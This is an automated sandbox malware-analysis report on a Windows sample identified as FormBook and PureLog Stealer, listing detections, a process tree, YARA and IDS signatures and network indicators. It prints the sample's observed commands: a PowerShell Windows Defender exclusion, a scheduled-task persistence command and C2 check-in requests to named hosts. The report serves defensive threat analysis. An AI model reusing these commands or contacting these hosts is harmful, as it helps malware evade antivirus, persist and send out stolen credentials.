Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nK1Y86mbzfbkwpB.exe

Overview

General Information

Sample name:nK1Y86mbzfbkwpB.exe
Analysis ID:1475272
MD5:3bfca4bfd7cdb0f712e4d362e3b320ff
SHA1:e5b837ee1dd3f31b9685216b9306ab4a7878421e
SHA256:5e8d9cec59c261ad6e67689490cdd741d56c682cbe9a4c90668f77ffb6f5cb05
Tags:exe
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses runas.exe to run programs with evaluated privileges
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • nK1Y86mbzfbkwpB.exe (PID: 5040 cmdline: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe" MD5: 3BFCA4BFD7CDB0F712E4D362E3B320FF)
    • powershell.exe (PID: 3328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5268 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7024 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 3300 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • hAtMBptzWt.exe (PID: 3172 cmdline: "C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runas.exe (PID: 6888 cmdline: "C:\Windows\SysWOW64\runas.exe" MD5: 13646BC81C39130487DA538B2DED5B28)
          • hAtMBptzWt.exe (PID: 5316 cmdline: "C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6704 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • GDhinOc.exe (PID: 6420 cmdline: C:\Users\user\AppData\Roaming\GDhinOc.exe MD5: 3BFCA4BFD7CDB0F712E4D362E3B320FF)
    • schtasks.exe (PID: 2988 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 2320 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 6264 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 4904 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • hAtMBptzWt.exe (PID: 5372 cmdline: "C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runas.exe (PID: 7100 cmdline: "C:\Windows\SysWOW64\runas.exe" MD5: 13646BC81C39130487DA538B2DED5B28)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b8d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1438f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000000.00000002.2183096912.0000000005370000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2b8d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x1438f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 20 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.nK1Y86mbzfbkwpB.exe.5370000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x2dd73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x16832:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              7.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                Click to see the 1 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe", ParentImage: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe, ParentProcessId: 5040, ParentProcessName: nK1Y86mbzfbkwpB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", ProcessId: 3328, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe", ParentImage: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe, ParentProcessId: 5040, ParentProcessName: nK1Y86mbzfbkwpB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", ProcessId: 3328, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\GDhinOc.exe, ParentImage: C:\Users\user\AppData\Roaming\GDhinOc.exe, ParentProcessId: 6420, ParentProcessName: GDhinOc.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp", ProcessId: 2988, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe", ParentImage: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe, ParentProcessId: 5040, ParentProcessName: nK1Y86mbzfbkwpB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", ProcessId: 7024, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe", ParentImage: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe, ParentProcessId: 5040, ParentProcessName: nK1Y86mbzfbkwpB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", ProcessId: 3328, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe", ParentImage: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe, ParentProcessId: 5040, ParentProcessName: nK1Y86mbzfbkwpB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", ProcessId: 7024, ProcessName: schtasks.exe

                Snort Signatures

                Timestamp:07/17/24-19:00:53.652505
                SID:2855465
                Source Port:63907
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/17/24-18:59:57.073970
                SID:2855465
                Source Port:63893
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/17/24-19:00:40.312082
                SID:2855465
                Source Port:63902
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/17/24-19:00:26.031224
                SID:2855465
                Source Port:63898
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Suricata Signatures

                Timestamp:2024-07-17T19:00:35.621547+0200
                SID:2855464
                Source Port:63900
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:00:52.335086+0200
                SID:2855464
                Source Port:63905
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:00:47.382097+0200
                SID:2855464
                Source Port:63903
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:01:01.582855+0200
                SID:2855464
                Source Port:63908
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:00:38.233207+0200
                SID:2855464
                Source Port:63901
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:00:32.577007+0200
                SID:2855464
                Source Port:63899
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:00:19.259253+0200
                SID:2855464
                Source Port:63895
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:00:54.774305+0200
                SID:2855465
                Source Port:63907
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:00:40.778213+0200
                SID:2855465
                Source Port:63902
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T18:59:57.833169+0200
                SID:2855465
                Source Port:63893
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:01:04.183883+0200
                SID:2855464
                Source Port:63909
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:00:21.843720+0200
                SID:2855464
                Source Port:63896
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:00:49.815005+0200
                SID:2855464
                Source Port:63904
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:00:54.774305+0200
                SID:2050745
                Source Port:63907
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-17T19:00:40.778213+0200
                SID:2050745
                Source Port:63902
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-17T19:00:26.999460+0200
                SID:2050745
                Source Port:63898
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-17T18:59:57.833169+0200
                SID:2050745
                Source Port:63893
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-17T19:00:24.415757+0200
                SID:2855464
                Source Port:63897
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-17T19:00:26.999460+0200
                SID:2855465
                Source Port:63898
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: nK1Y86mbzfbkwpB.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeAvira: detection malicious, Label: HEUR/AGEN.1362865
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeReversingLabs: Detection: 52%
                Multi AV Scanner detection for submitted file
                Source: nK1Y86mbzfbkwpB.exeReversingLabs: Detection: 52%
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: nK1Y86mbzfbkwpB.exeJoe Sandbox ML: detected
                Source: nK1Y86mbzfbkwpB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: nK1Y86mbzfbkwpB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2494695347.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2689518401.0000000001137000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000002.3354731785.0000000001128000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354390333.0000000001318000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hAtMBptzWt.exe, 00000010.00000000.2407457604.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp, hAtMBptzWt.exe, 00000014.00000002.3352923930.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp, hAtMBptzWt.exe, 00000016.00000002.3356664916.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb, source: runas.exe, 00000011.00000002.3352619446.0000000002807000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3358247281.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000000.2669239142.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2941051604.000000001675C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.2495139011.0000000001460000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2502199934.0000000004329000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.000000000466E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2494898305.0000000004175000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.00000000044D0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2690019481.0000000004A70000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2698618753.0000000004C22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.2495139011.0000000001460000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000011.00000003.2502199934.0000000004329000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.000000000466E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2494898305.0000000004175000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.00000000044D0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2690019481.0000000004A70000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2698618753.0000000004C22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: runas.exe, 00000011.00000002.3352619446.0000000002807000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3358247281.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000000.2669239142.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2941051604.000000001675C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: runas.pdb source: RegSvcs.exe, 00000007.00000002.2494695347.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2689518401.0000000001137000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000002.3354731785.0000000001128000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354390333.0000000001318000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023BC330 FindFirstFileW,FindNextFileW,FindClose,17_2_023BC330
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 4x nop then jmp 06F7B971h0_2_06F7BE73
                Source: C:\Windows\SysWOW64\runas.exeCode function: 4x nop then xor eax, eax17_2_023A9B40
                Source: C:\Windows\SysWOW64\runas.exeCode function: 4x nop then pop edi17_2_023B255F
                Source: C:\Windows\SysWOW64\runas.exeCode function: 4x nop then mov ebx, 00000004h17_2_043704E8

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:63893 -> 185.179.189.181:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:63898 -> 172.96.191.69:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:63902 -> 13.248.169.48:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:63907 -> 162.159.134.42:80
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 162.159.134.42 162.159.134.42
                Source: Joe Sandbox ViewIP Address: 162.159.134.42 162.159.134.42
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
                Source: Joe Sandbox ViewASN Name: WEBHOST1-ASRU WEBHOST1-ASRU
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /midu/?zn6L=9nR4RRbtczDLM92wROaICO8mWeENBuMayS9RmkCU7FdLWzi6Zh5WY9LbBJga/o2cXaf6PRrIolXtwoFpXTr9SyPSPVCys8awhBwFZAVidM2Yj+9OFlKtZImodfdv2xp/fybq7VQ=&BF=AP6PLVoH-l HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enHost: www.scottifqqy.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
